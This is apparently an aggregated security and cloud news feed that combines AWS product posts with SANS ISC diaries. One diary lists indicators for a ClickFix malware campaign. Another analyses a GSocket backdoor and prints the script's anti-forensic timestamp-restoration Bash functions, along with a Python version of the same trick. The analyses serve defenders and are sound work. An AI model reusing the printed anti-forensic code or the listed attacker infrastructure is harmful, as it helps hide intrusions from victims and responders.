This is the first update to the TeamPCP supply chain campaign threat intelligence report, “When the Security Scanner Became the Weapon” (v3.0, March 25, 2026). That report covers the full campaign from the February 28 initial access through the March 24 LiteLLM PyPI compromise. This update covers developments since publication.
Apple Patches (almost) everything again. March 2026 edition, (Wed, Mar 25th)
Apple released the next versions of its operating systems, patching 85 different vulnerabilities across all of them. None of the vulnerabilities are currently being exploited. The last three macOS "generations" are covered, as are the last two versions of iOS/iPadOS. For tvOS, watchOS, and visionOS, only the current version received patches. This update also includes the recently released Background Security Improvements. Some older watchOS versions received updates, but these updates do not address any security issues.
Announcing Amazon Aurora PostgreSQL serverless database creation in seconds
At re:Invent 2025, Colin Lazier, vice president of databases at AWS, emphasized the importance of building at the speed of an idea—enabling rapid progress from concept to running application. Customers can already create production-ready Amazon DynamoDB tables and Amazon Aurora DSQL databases in seconds. He previewed creating an Amazon Aurora serverless database with the same speed, and customers have since asked for access to this capability.

Today, we’re announcing the general availability of a new express configuration for Amazon Aurora PostgreSQL, a streamlined database creation experience with preconfigured defaults designed to help you get started in seconds.
With only two clicks, you can have an Aurora PostgreSQL serverless database ready to use in seconds. The new configuration still gives you the flexibility to modify certain settings during and after database creation. For example, you can change the capacity range for the serverless instance at creation time, or add read replicas and modify parameter groups after the database is created. Aurora clusters with express configuration are created without an Amazon Virtual Private Cloud (Amazon VPC) network and include an internet access gateway for secure connections from your favorite development tools, with no VPN or AWS Direct Connect required. Express configuration also sets up AWS Identity and Access Management (IAM) authentication for your administrator user by default, enabling passwordless database authentication from the beginning without additional configuration.
After it’s created, you have access to features available for Aurora PostgreSQL serverless, such as deploying additional read replicas for high availability and automated failover capabilities. This launch also introduces a new internet access gateway routing layer for Aurora. Your new serverless instance comes enabled by default with this feature, which allows your applications to connect securely from anywhere in the world through the internet using the PostgreSQL wire protocol from a wide range of developer tools. This gateway is distributed across multiple Availability Zones, offering the same level of high availability as your Aurora cluster.
Creating and connecting to Aurora in seconds means fundamentally rethinking how you get started. We launched multiple capabilities that work together to help you onboard and run your application with Aurora. Aurora is now available on the AWS Free Tier, so you can gain hands-on experience with Aurora at no upfront cost. After a database is created, you can query it directly in AWS CloudShell, or from programming languages and developer tools through a new internet-accessible routing component for Aurora. With integrations such as v0 by Vercel, you can use natural language to start building your application with the features and benefits of Aurora.
Create an Aurora PostgreSQL serverless database in seconds
To get started, go to the Aurora and RDS console and in the navigation pane, choose Dashboard. Then, choose Create (the button with a rocket icon).

Review pre-configured settings in the Create with express configuration dialog box. You can modify the DB cluster identifier or the capacity range as needed. Choose Create database.

You can also use the AWS Command Line Interface (AWS CLI) or AWS SDKs with the parameter --express-configuration to create both a cluster and an instance within the cluster in a single API call, making the database ready for queries in seconds. To learn more, visit Creating an Aurora PostgreSQL DB cluster with express configuration.
Here is a CLI command to create the cluster:
$ aws rds create-db-cluster \
    --db-cluster-identifier channy-express-db \
    --engine aurora-postgresql \
    --with-express-configuration
Your Aurora PostgreSQL serverless database should be ready in seconds. A success banner confirms the creation, and the database status changes to Available.

After your database is ready, go to the Connectivity & security tab to access three connection options. When connecting through SDKs, APIs, or third-party tools including agents, choose Code snippets. You can choose various programming languages such as .NET, Golang, JDBC, Node.js, PHP, PSQL, Python, and TypeScript. You can paste the code from each step into your tool and run the commands.
For example, the following Python code is dynamically generated to reflect the authentication configuration:
import psycopg2
import boto3

auth_token = boto3.client('rds', region_name='ap-south-1').generate_db_auth_token(
    DBHostname='channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
    Port=5432,
    DBUsername='postgres',
    Region='ap-south-1'
)

conn = None
try:
    conn = psycopg2.connect(
        host='channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
        port=5432,
        database='postgres',
        user='postgres',
        password=auth_token,
        sslmode='require'
    )
    cur = conn.cursor()
    cur.execute('SELECT version();')
    print(cur.fetchone()[0])
    cur.close()
except Exception as e:
    print(f"Database error: {e}")
    raise
finally:
    if conn:
        conn.close()
The corresponding Node.js snippet uses the RDS Signer to generate the token:
const { Client } = require('pg');
const AWS = require('aws-sdk');

AWS.config.update({ region: 'ap-south-1' });

async function main() {
  const signer = new AWS.RDS.Signer({
    region: 'ap-south-1',
    hostname: 'channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
    port: 5432,
    username: 'postgres'
  });
  const password = signer.getAuthToken({});
  const client = new Client({
    host: 'channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
    port: 5432,
    database: 'postgres',
    user: 'postgres',
    password,
    ssl: { rejectUnauthorized: false }
  });
  try {
    await client.connect();
    const res = await client.query('SELECT version()');
    console.log(res.rows[0].version);
  } catch (error) {
    console.error('Database error:', error);
    throw error;
  } finally {
    await client.end();
  }
}

main().catch(console.error);
Choose CloudShell for quick access to the AWS CLI, which launches directly from the console. When you choose Launch CloudShell, the command comes pre-populated with the information needed to connect to your specific cluster. After connecting to the shell, you should see the psql login and the postgres=> prompt where you can run SQL commands.

You can also choose Endpoints to use tools that only support username and password credentials, such as pgAdmin. When you choose Get token, an IAM authentication token is generated for you to use in the password field. The token is generated for the master username that you set up when creating the database and is valid for 15 minutes at a time. If the tool you’re using terminates the connection, you will need to generate the token again.
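Because tokens expire after 15 minutes, a long-running tool needs to regenerate them before reconnecting. Here is a minimal, stdlib-only sketch of that bookkeeping; `generate_token` is a hypothetical stand-in for whatever utility actually produces the IAM token, and the 60-second refresh margin is an assumption, not an AWS recommendation:

```python
import time

TOKEN_TTL_SECONDS = 15 * 60  # IAM auth tokens are valid for 15 minutes


class TokenCache:
    """Regenerates the auth token once its 15-minute lifetime is nearly over."""

    def __init__(self, generate_token, margin_seconds=60, clock=time.monotonic):
        self._generate = generate_token  # stand-in for the real token generator
        self._margin = margin_seconds    # refresh early to avoid mid-connect expiry
        self._clock = clock
        self._token = None
        self._issued_at = None

    def get(self):
        now = self._clock()
        expired = (
            self._token is None
            or now - self._issued_at >= TOKEN_TTL_SECONDS - self._margin
        )
        if expired:
            # Token missing or about to expire: fetch a fresh one
            self._token = self._generate()
            self._issued_at = now
        return self._token
```

A client would then pass `cache.get()` as the password on every reconnect instead of reusing a stale token.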
Building your application faster with Aurora databases
At re:Invent 2025, we announced enhancements to the AWS Free Tier program, offering up to $200 in AWS credits that can be used across AWS services. You’ll receive $100 in AWS credits upon sign-up and can earn an additional $100 in credits by using services such as Amazon Relational Database Service (Amazon RDS), AWS Lambda, and Amazon Bedrock. In addition, Amazon Aurora is now available across a broad set of eligible Free Tier database services.

Developers are embracing platforms such as Vercel, where natural language is all it takes to build production-ready applications. We announced integrations with the Vercel Marketplace, so you can create and connect to an AWS database directly from Vercel in seconds, and with v0 by Vercel, an AI-powered tool that transforms your ideas into production-ready, full-stack web applications in minutes. v0 includes Aurora PostgreSQL, Aurora DSQL, and DynamoDB databases. You can also connect your existing databases created through express configuration with Vercel. To learn more, visit AWS for Vercel.

As with Vercel, we’re bringing our databases seamlessly into the experiences developers already use, integrating directly with widely adopted frameworks, AI-assisted coding tools, environments, and developer tools, all to unlock your ability to build at the speed of an idea.
We introduced an Aurora PostgreSQL integration with Kiro powers, which developers can use to build Aurora PostgreSQL-backed applications faster with AI agent-assisted development through Kiro. You can install the Kiro power for Aurora PostgreSQL within the Kiro IDE or with one click from the Kiro powers webpage. To learn more about this Kiro power, read Introducing Amazon Aurora powers for Kiro and Amazon Aurora Postgres MCP Server.

Now available
You can create an Aurora PostgreSQL serverless database in seconds today in all AWS commercial Regions. For Regional availability and a future roadmap, visit the AWS Capabilities by Region.
You pay only for the capacity your database consumes, measured in Aurora Capacity Units (ACUs) and billed per second starting from zero capacity. The database automatically starts up, shuts down, and scales capacity up or down based on your application’s needs. To learn more, visit the Amazon Aurora Pricing page.
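As a back-of-the-envelope illustration of per-second ACU billing, the sketch below totals ACU-seconds over a day in which the database is idle (at zero capacity) most of the time. The $0.12 per ACU-hour figure is a hypothetical placeholder, not an actual Aurora rate; check the pricing page for real numbers.

```python
# Hypothetical price per ACU-hour -- see the Amazon Aurora Pricing page for real rates.
PRICE_PER_ACU_HOUR = 0.12


def daily_cost(usage_periods):
    """usage_periods: list of (acus, seconds) tuples; idle time at 0 ACUs costs nothing."""
    acu_seconds = sum(acus * seconds for acus, seconds in usage_periods)
    return acu_seconds / 3600 * PRICE_PER_ACU_HOUR


# 2 ACUs for one busy hour, 0.5 ACU for two hours of light traffic, idle otherwise
cost = daily_cost([(2, 3600), (0.5, 2 * 3600)])
```

Scaling to zero is what makes this model attractive for development databases: the idle hours simply drop out of the sum.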
Give it a try in the Aurora and RDS console and send feedback to AWS re:Post for Aurora PostgreSQL or through your usual AWS Support contacts.
— Channy
SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT (ArechClient2), (Wed, Mar 25th)
Introduction
This diary provides indicators from the SmartApeSG (ZPHP, HANEYMANEY) campaign I saw on Tuesday, 2026-03-24. SmartApeSG is one of many campaigns that use the ClickFix technique. This past week, I've seen NetSupport RAT as follow-up malware from Remcos RAT pushed by this campaign. But this time, I also saw indicators for StealC malware and Sectop RAT (ArechClient2) after NetSupport RAT appeared on my infected lab host.
Not all of the follow-up malware appears shortly after the initial Remcos RAT malware. Here's the timeline for malware from my SmartApeSG activity on Tuesday 2026-03-24:
- 17:11 UTC – Ran ClickFix script from SmartApeSG fake CAPTCHA page
- 17:12 UTC – Remcos RAT post-infection traffic starts
- 17:16 UTC – NetSupport RAT post-infection traffic starts
- 18:18 UTC – StealC post-infection traffic starts
- 19:36 UTC – Sectop RAT post-infection traffic starts
While the NetSupport RAT activity happened approximately 4 minutes after the Remcos RAT activity, the StealC traffic didn't happen until approximately 1 hour after the NetSupport RAT activity started. And the traffic for Sectop RAT happened approximately 1 hour and 18 minutes after the StealC activity started.
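The stage-to-stage delays are easy to check directly from the timestamps above; a quick stdlib sketch:

```python
from datetime import datetime

# Timeline from the 2026-03-24 SmartApeSG infection (times in UTC)
timeline = {
    "ClickFix script": "17:11",
    "Remcos RAT": "17:12",
    "NetSupport RAT": "17:16",
    "StealC": "18:18",
    "Sectop RAT": "19:36",
}

events = [(name, datetime.strptime(t, "%H:%M")) for name, t in timeline.items()]
for (prev_name, prev_t), (name, t) in zip(events, events[1:]):
    minutes = int((t - prev_t).total_seconds() // 60)
    print(f"{prev_name} -> {name}: {minutes} min")
```

The gaps come out to 4 minutes for NetSupport RAT, 62 minutes for StealC, and 78 minutes (1 hour 18 minutes) for Sectop RAT, matching the approximations above.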
Images from the infection

Shown above: Page from a legitimate but compromised website with injected script for the fake CAPTCHA page.

Shown above: Fake CAPTCHA page with ClickFix instructions. This image shows the malicious script injected into a user's clipboard.

Shown above: Traffic from the infection filtered in Wireshark.
Indicators of Compromise
Associated domains and IP addresses:
- fresicrto[.]top – Domain for server hosting fake CAPTCHA page
- urotypos[.]com – Called by ClickFix instructions, this domain is for a server hosting the initial malware
- 95.142.45[.]231:443 – Remcos RAT C2 server
- 185.163.47[.]220:443 – NetSupport RAT C2 server
- 89.46.38[.]100:80 – StealC C2 server
- 195.85.115[.]11:9000 – Sectop RAT (ArechClient2) C2 server
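The indicators above are defanged for safe sharing. Analysts often need to refang them before loading into blocklists or pivoting in other tools; here is a small stdlib helper for one common defanging convention (hxxp prefix, bracketed dots and colons). It is my own sketch, not part of the campaign artifacts:

```python
import re


def refang(indicator: str) -> str:
    """Convert a defanged indicator (hxxp, [.], [:]) back to its live form."""
    s = indicator.replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", s)


def defang(indicator: str) -> str:
    """Make an indicator safe to share: http -> hxxp, dots bracketed."""
    s = re.sub(r"^http", "hxxp", indicator)
    return s.replace(".", "[.]")
```

Note that some conventions (as in the IP list above) bracket only the last dot; adjust to taste.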
Example of HTA file retrieved by ClickFix script:
- SHA256 hash: 212d8007a7ce374d38949cf54d80133bd69338131670282008940f1995d7a720
- File size: 47,714 bytes
- File type: HTML document text, ASCII text, with very long lines (6272)
- Retrieved from: hxxps://urotypos[.]com/cd/temp
- Saved location: C:\Users\[username]\AppData\Local\post.hta
- Note: ClickFix script deletes the file after retrieving and running it
Example of ZIP archive for Remcos RAT retrieved by the above HTA file:
- SHA256 hash: a6a748c0606fb9600fdf04763523b7da20b382b054b875fdd1ef1c36fc16079a
- File size: 85,328,653 bytes
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- Retrieved from: hxxps://urotypos[.]com/ls/production
- Saved location: C:\Users\[username]\AppData\Local\361118191\361118191.pdf
ZIP archive containing NetSupport RAT package:
- SHA256 hash: 6e26ff49387088178319e116700b123d27216d98ba3ae1ce492544cb9acd38f0
- File size: 9,171,647 bytes
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- File name: UpdateInstaller.zip
- Note: I created this zip archive from the extracted files under C:\ProgramData\UpdateInstaller
RAR archive for StealC package:
- SHA256 hash: a7b9be1211c6de76bab31dbcd3a1c99861cf18e3230ea9f634e07d22c179d1ca
- File size: 6,178,471 bytes
- File type: RAR archive data, v5
- Saved location: C:\Users\Public\Music\finalmesh.zip
RAR archive for Sectop RAT (ArechClient2) package:
- SHA256 hash: c90435370728d48cba1c00d92cc3bf99e85f01aa52ecd6c6df2e8137db964796
- File size: 6,908,049 bytes
- File type: RAR archive data, v5
- Saved location: C:\ProgramData\drag2pdf.zip
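To compare a captured file against SHA256 hashes like those listed above, the stdlib hashlib module is enough; streaming in chunks keeps memory flat even for the 85 MB Remcos archive:

```python
import hashlib


def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream the file in chunks so large archives don't load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


# Example: compare a local capture against a listed indicator
# sha256_of("UpdateInstaller.zip") == "6e26ff49387088178319e116700b123d27216d98ba3ae1ce492544cb9acd38f0"
```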
Final words
The archive files for Remcos RAT, StealC and Sectop RAT are packages that use legitimate EXE files to side-load malicious DLLs (a technique called DLL side-loading). The NetSupport RAT package is a legitimate tool that's configured to use an attacker-controlled server.
As always, the files, URLs and domains for SmartApeSG activity change on a near-daily basis. And names of the HTA file and ZIP archive for Remcos RAT are different for each infection. The indicators described in this article may no longer be current as you read this. However, this activity confirms that the SmartApeSG campaign can push a variety of malware after an initial infection.
—
Bradley Duncan
brad [at] malware-traffic-analysis.net
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Detecting IP KVMs, (Tue, Mar 24th)
I have written about how to use IP KVMs securely, and recently, researchers at Eclypsium published yet another report on IP KVM vulnerabilities. But there is another issue I haven't mentioned yet with IP KVMs: rogue IP KVMs. IP KVMs are often used by criminals. For example, North Korean workers used IP KVMs to connect remotely to laptops sent to them by their employers; the laptops stayed in the US while the workers accessed them from abroad. IP KVMs could also be used to access office PCs, either to enable undetected "work from home" or by threat actors who use them to gain remote access after installing the device on site.
Tool updates: lots of security and logic fixes, (Mon, Mar 23rd)
So, I've been slow to get on the Claude Code/OpenCode/Codex/OpenClaw bandwagon, but I had some time last week, so I asked Claude to review (/security-review) some of my Python scripts. He found more than I'd like to admit, so I checked in a bunch of updates. Reviewing his suggestions, he was right: I made some stupid mistakes, some of which have been sitting in there for a long time. It was nothing earth-shattering, and it took almost no time for Claude; it took longer for me to read through the updates he wanted to make, figure out what he was seeing, and decide whether to accept them or tweak them. Here are a few of them.
AWS Weekly Roundup: NVIDIA Nemotron 3 Super on Amazon Bedrock, Nova Forge SDK, Amazon Corretto 26, and more (March 23, 2026)
Hello! I’m Daniel Abib, and this is my first AWS Weekly Roundup. I’m a Senior Specialist Solutions Architect at AWS, focused on generative AI and Amazon Bedrock. With over 28 years of experience in solution architecture, software development, and cloud architecture, I help startups and enterprises harness the power of generative AI with Amazon Bedrock. I’ve been at AWS for more than six and a half years, working closely with customers across Latin America, and I’m also passionate about serverless technologies.

Outside of work and endurance sports, I’m a dedicated father to Cecília (7) and Rafael (4), who keep me busier, and happier, than any distributed system ever could. I’m based in São Paulo, and you can find me on LinkedIn and X (@DCABib), where I share insights about generative AI, Amazon Bedrock, AWS serverless services, and the occasional Ironman throwback.
Now, let’s get into this week’s AWS news…
Last week’s launches
Here are some launches and updates from this past week that caught my attention:
- Amazon Redshift increases performance for new queries in dashboards and ETL workloads by up to 7x — Amazon Redshift now delivers up to 7x faster performance for new queries in dashboards and ETL workloads. Queries you run for the first time — without cached results — now execute significantly faster, reducing wait times for interactive dashboards and accelerating your ETL pipelines. This is particularly impactful for workloads with high query variability where cache hits are less frequent.
- NVIDIA Nemotron 3 Super now available on Amazon Bedrock — NVIDIA Nemotron 3 Super is now available in Amazon Bedrock, expanding the lineup of foundation models you can access through the unified Bedrock API. Nemotron 3 Super is a high-performance language model optimized for tasks such as text generation, complex reasoning, summarization, and code generation. You can now invoke Nemotron 3 Super alongside other foundation models in your existing Bedrock workflows, without managing any infrastructure.
- Introducing Nova Forge SDK, a seamless way to customize Nova models for enterprise AI — Nova Forge SDK provides a streamlined way to fine-tune and customize Amazon Nova models for enterprise use cases. You can adapt Nova models to your domain-specific data and deploy them directly within Amazon Bedrock, reducing the complexity of building tailored AI solutions. The SDK handles the heavy lifting of model customization, letting you focus on your business logic rather than the underlying infrastructure.
- Amazon Corretto 26 is now generally available — Amazon Corretto 26, the latest long-term support (LTS) release of the no-cost, production-ready distribution of OpenJDK, is now generally available. Corretto 26 includes the latest Java language features, performance improvements, and security patches, all backed by long-term support from AWS. You can use it across development and production environments on Amazon Linux, Windows, macOS, and Docker images.
- AWS Lambda now supports Availability Zone metadata — AWS Lambda now provides Availability Zone metadata for your function invocations. You can now identify which Availability Zone your Lambda function is running in, enabling better observability, more informed architectural decisions, and simplified troubleshooting for latency-sensitive and multi-AZ workloads. This is particularly useful when correlating Lambda execution with other AZ-aware services in your architecture.
- Amazon CloudWatch Logs now supports log ingestion using HTTP-based protocol — Amazon CloudWatch Logs now supports ingesting logs using an HTTP-based protocol, making it simpler to send logs from applications and services that use standard HTTP endpoints. You can now route logs to CloudWatch Logs without requiring custom agents or additional SDK integrations, lowering the barrier to centralized log management across your workloads.
- Amazon EKS announces 99.99% Service Level Agreement and new 8XL scaling tier for Provisioned Control Plane clusters — Amazon EKS now offers a 99.99% Service Level Agreement (SLA) for clusters running on Provisioned Control Plane, up from the 99.95% SLA offered on standard control plane. EKS is also introducing the 8XL scaling tier, the largest available Provisioned Control Plane tier, which doubles the Kubernetes API server request processing capacity of the next lower 4XL tier — ideal for large-scale workloads like AI/ML training, high-performance computing (HPC), and large-scale data processing.
Other AWS news
Here are some additional posts and resources that you might find interesting:
- Kiro for students — Kiro is now available for students, giving the next generation of builders access to AI-powered development tools at no cost. As Swami Sivasubramanian shared on LinkedIn, “Students are the future decision-makers shaping technology” — and Kiro gives them hands-on experience building with AI from day one. If you’re a student or know someone who is, this is a great opportunity to start building with AI-assisted development.
- Strands Steering Hooks achieved 100% agent accuracy — The Strands Agents team published results showing that Steering Hooks can achieve 100% agent accuracy, outperforming both prompt engineering and rigid workflow approaches for controlling agent behavior. As Swami highlighted on LinkedIn, building reliable AI agents often means rethinking how we guide model behavior — and Steering Hooks offer a compelling new path to agent reliability.
- Introducing Badges on AWS Builder Center — AWS Builder Center now features badges that recognize your contributions and achievements within the builder community. You can earn badges by sharing solutions, participating in challenges, and engaging with fellow builders. It’s a great way to showcase your expertise and track your growth.
- Keep Building Together: The Power of Community — A thoughtful read on the power of community-driven learning and collaboration in the AWS ecosystem. Whether you’re just getting started with AWS or you’ve been building for years, the builder community is a place to connect, share knowledge, and grow together. I highly recommend checking it out.
Upcoming AWS events
Check your calendar and sign up for upcoming AWS events:
- AWS Summits — Join AWS Summits in 2026, free in-person events where you can explore emerging cloud and AI technologies, learn best practices, and network with industry peers and experts. Upcoming Summits include Paris (April 1), London (April 22), Bengaluru (April 23–24), Singapore (May 6), Tel Aviv (May 6), and Stockholm (May 7).
- AWS Community Days — Community-led conferences where content is planned, sourced, and delivered by community leaders, featuring technical discussions, workshops, and hands-on labs. Upcoming events include San Francisco (April 10) and Romania (April 23–24).
- AWSome Women Summit LATAM — Taking place on March 28 in Mexico City, this event celebrates and empowers women in cloud technology across Latin America. A fantastic initiative for the LATAM tech community.
Join the AWS Builder Center to connect with builders, share solutions, and access content that supports your development. Browse the AWS Events and Webinars for upcoming AWS-led in-person and virtual events and developer-focused events.
That’s all for this week. Check back next Monday for another Weekly Roundup!
This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!
GSocket Backdoor Delivered Through Bash Script, (Fri, Mar 20th)
Yesterday, I discovered a malicious Bash script that installs a GSocket backdoor on the victim’s computer. I don’t know the source of the script nor how it is delivered to the victim.
GSocket[1] is a networking tool, but also a relay infrastructure, that enables direct, peer-to-peer–style communication between systems using a shared secret instead of IP addresses or open ports. It works by having both sides connect outbound to a global relay network. Tools like gs-netcat can provide remote shells, file transfer, or tunneling and bypass classic security controls. The script that I found uses a copy of gs-netcat but the way it implements persistence and anti-forensic techniques deserves a review.
A few weeks ago, I found a sample that used GSocket connectivity as a C2 channel. This made me curious, and I started hunting for more samples. Bingo! The new one that I found (SHA256: 6ce69f0a0db6c5e1479d2b05fb361846957f5ad8170f5e43c7d66928a43f3286[2]) has been detected by only 17 antivirus solutions on VT. The script is not obfuscated and even has comments, so I think that it was uploaded to VT for "testing" purposes by the developer (just a guess).
Let’s have a look at the techniques used. When you execute it in a sandbox, you see this:

Note the identification of the tool ("G-Socket Bypass Stealth") and the reference to "@bboscat"[3].
A GSocket client is downloaded, started, and talks to the following IP:

The malware implements persistence through different well-known techniques on Linux. First, a cron job is created:

At the top of every hour, the disguised gs-netcat is killed (if running) and restarted. To improve persistence, the same code is added to the victim's .profile:

The malware itself is copied to .ssh/putty, and the GSocket shared secret is stored in a fake SSH key file:

The ELF file id_rsa (SHA256: d94f75a70b5cabaf786ac57177ed841732e62bdcc9a29e06e5b41d9be567bcfa) is the gs-netcat tool downloaded directly from the G-Socket CDN.
Ok, let’s have a look at an interesting anti-forensic technique implemented in the Bash script. File operations are not simply performed using classic commands like cp, rm, mv, etc. They are embedded in “helper” functions with a timestamp tracking/restoration system so the malware can later hide filesystem changes. Here is an example with a function that will create a file:
mk_file()
{
    local fn
    local oldest
    local pdir
    local pdir_added
    fn="$1"
    local exists
    # DEBUGF "${CC}MK_FILE($fn)${CN}"
    pdir="$(dirname "$fn")"
    [[ -e "$fn" ]] && exists=1
    ts_is_marked "$pdir" || {
        # HERE: Parent not tracked
        _ts_add "$pdir" "<NOT BY XMKDIR>"
        pdir_added=1
    }
    ts_is_marked "$fn" || {
        # HERE: Not yet tracked
        _ts_get_ts "$fn"
        # Do not add creation fails.
        touch "$fn" 2>/dev/null || {
            # HERE: Permission denied
            [[ -n "$pdir_added" ]] && {
                # Remove pdir if it was added above
                # Bash <5.0 does not support arr[-1]
                # Quote (") to silence shellcheck
                unset "_ts_ts_a[${#_ts_ts_a[@]}-1]"
                unset "_ts_fn_a[${#_ts_fn_a[@]}-1]"
                unset "_ts_mkdir_fn_a[${#_ts_mkdir_fn_a[@]}-1]"
            }
            return 69 # False
        }
        [[ -z $exists ]] && chmod 600 "$fn"
        _ts_ts_a+=("$_ts_ts")
        _ts_fn_a+=("$fn");
        _ts_mkdir_fn_a+=("<NOT BY XMKDIR>")
        return
    }
    touch "$fn" 2>/dev/null || return
    [[ -z $exists ]] && chmod 600 "$fn"
    true
}
Here are two more interesting functions:
# Restore timestamp of files
ts_restore()
{
    local fn
    local n
    local ts
    [[ ${#_ts_fn_a[@]} -ne ${#_ts_ts_a[@]} ]] && { echo >&2 "Ooops"; return; }
    n=0
    while :; do
        [[ $n -eq "${#_ts_fn_a[@]}" ]] && break
        ts="${_ts_ts_a[$n]}"
        fn="${_ts_fn_a[$n]}"
        # DEBUGF "RESTORE-TS ${fn} ${ts}"
        ((n++))
        _ts_fix "$fn" "$ts"
    done
    unset _ts_fn_a
    unset _ts_ts_a
    n=0
    while :; do
        [[ $n -eq "${#_ts_systemd_ts_a[@]}" ]] && break
        ts="${_ts_systemd_ts_a[$n]}"
        fn="${_ts_systemd_fn_a[$n]}"
        # DEBUGF "RESTORE-LAST-TS ${fn} ${ts}"
        ((n++))
        _ts_fix "$fn" "$ts" "symlink"
    done
    unset _ts_systemd_fn_a
    unset _ts_systemd_ts_a
}

ts_is_marked()
{
    local fn
    local a
    fn="$1"
    for a in "${_ts_fn_a[@]}"; do
        [[ "$a" = "$fn" ]] && return 0 # True
    done
    return 1 # False
}
ts_is_marked() checks whether a file/directory is already registered for timestamp restoration, preventing duplicate tracking and ensuring the script’s anti-forensic timestamp manipulation works correctly. I asked ChatGPT to generate a graph that explains this technique:

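For readers who prefer code to a graph, the core idea reduces to a few lines of Python: record a file's timestamps before touching it, then restore them afterward so the modification leaves no obvious mtime change. This is my own simplified stdlib illustration of the concept, not the script's implementation:

```python
import os

# (path, (atime, mtime)) pairs, analogous to the script's _ts_fn_a/_ts_ts_a arrays
_saved = []


def ts_mark(path):
    """Record timestamps before modification (like the script's _ts_get_ts)."""
    st = os.stat(path)
    _saved.append((path, (st.st_atime, st.st_mtime)))


def ts_restore():
    """Put the original timestamps back (like the script's ts_restore)."""
    while _saved:
        path, times = _saved.pop()
        os.utime(path, times)
```

After `ts_restore()` runs, a quick `ls -l` or mtime-based triage will not flag the files the script modified, which is exactly why this class of anti-forensics matters to responders.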
Finally, because it’s fully based on Bash, the script can infect any UNIX flavor, macOS included:
[[ -z "$OSTYPE" ]] && {
    local osname
    osname="$(uname -s)"
    if [[ "$osname" == *FreeBSD* ]]; then
        OSTYPE="FreeBSD"
    elif [[ "$osname" == *Darwin* ]]; then
        OSTYPE="darwin22.0"
    elif [[ "$osname" == *OpenBSD* ]]; then
        OSTYPE="openbsd7.3"
    elif [[ "$osname" == *Linux* ]]; then
        OSTYPE="linux-gnu"
    fi
}
[1] https://www.gsocket.io
[2] https://www.virustotal.com/gui/file/6ce69f0a0db6c5e1479d2b05fb361846957f5ad8170f5e43c7d66928a43f3286/telemetry
[3] https://zone-xsec.com/archive/attacker/%40bboscat
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
20 years in the AWS Cloud – how time flies!
AWS has reached its 20th anniversary! With a steady pace of innovation, AWS has grown to offer over 240 comprehensive cloud services and continues to launch thousands of new features annually for millions of customers. During this time, over 4,700 posts have been published on this blog, more than double the number published by the time Jeff Barr wrote the 10th anniversary post.
AWS changed my life
Reflecting on what I was doing 20 years ago, I met Jeff in Seoul on March 13, 2006, when he came as the keynote speaker for the Korea NGWeb conference. At that time, Amazon was one of the first pioneers to initiate an API economy, introducing ecommerce API services. After the keynote speech, he returned home that evening, and I believe he wrote the Amazon S3 launch blog post on the flight back to the United States.

That short meeting with him brought significant changes to my life. He became my role model as a blogger, and I began building API-based services in my company and opening them to third-party developers. When I was a PhD student while taking a break from work, I realized that for individual researchers like me, AWS Cloud services are powerful tools for conducting large-scale research projects. After returning to work, my company became one of the first AWS customers in Korea in 2014. Countless developers—myself included—have embraced cloud computing and actively used its capabilities to accomplish what was previously impossible.
Over the past decade, the technology landscape has transformed dramatically. Deep learning emerged as a breakthrough in AI, evolving through generative AI based on large language models (LLMs) to today’s agentic AI technology. Jeff wrote, “When looking into the future, you need to be able to distinguish between flashy distractions and genuine trends, while remaining flexible enough to pivot if yesterday’s niche becomes today’s mainstream technology.” This principle guides how AWS approaches innovation—we start by listening to what customers truly need. The real trend isn’t pursuing every emerging technology, but rather reimagining solutions that address customers’ most critical challenges.
20 years of AWS
For the first 10 years, Jeff selected his favorite AWS launches and blog posts: Amazon S3 and Amazon EC2 (2006), Amazon Relational Database Service and Amazon Virtual Private Cloud (2009), Amazon DynamoDB and Amazon Redshift (2012), Amazon WorkSpaces and Amazon Kinesis (2013), AWS Lambda (2014), and AWS IoT (2015).

While I also hate to play favorites, I want to choose some of my favorite AWS blog posts of the past decade.
- Deploying containers easily (2014) – Amazon Elastic Container Service makes it straightforward for you to run any number of containers across a managed cluster of Amazon EC2 instances using powerful APIs and other tools. In 2017, we launched Amazon Elastic Kubernetes Service as a fully managed Kubernetes service and AWS Fargate as a serverless deployment option.
- High availability database at global scale (2017) – Amazon Aurora is a modern relational database service offering performance and high availability at scale. In 2018, we launched Amazon Aurora Serverless v1, and this serverless database evolved into Amazon Aurora Serverless v2, which can scale down to zero. In 2025, we also launched Amazon Aurora DSQL, the fastest serverless distributed SQL database for always-available applications.
- Machine learning (ML) at your fingertips (2017) – Amazon SageMaker is a fully managed end-to-end ML service that data scientists, developers, and ML experts can use to quickly build, train, and host machine learning models at scale. In 2024, we launched the next generation of Amazon SageMaker, a unified platform for data, analytics, and AI, and introduced Amazon SageMaker AI to focus specifically on building, training, and deploying AI and ML models at scale.
- Best price performance for cloud workloads (2018) – We launched Amazon EC2 A1 instances powered by the first generation of Arm-based AWS Graviton processors, designed to deliver the best price performance for your cloud workloads. Last year, we previewed EC2 M9g instances powered by AWS Graviton5 processors. Over 90,000 AWS customers have reaped the benefits of Graviton, which powers popular AWS services such as Amazon ECS, Amazon EKS, AWS Lambda, Amazon RDS, Amazon ElastiCache, Amazon EMR, and Amazon OpenSearch Service.
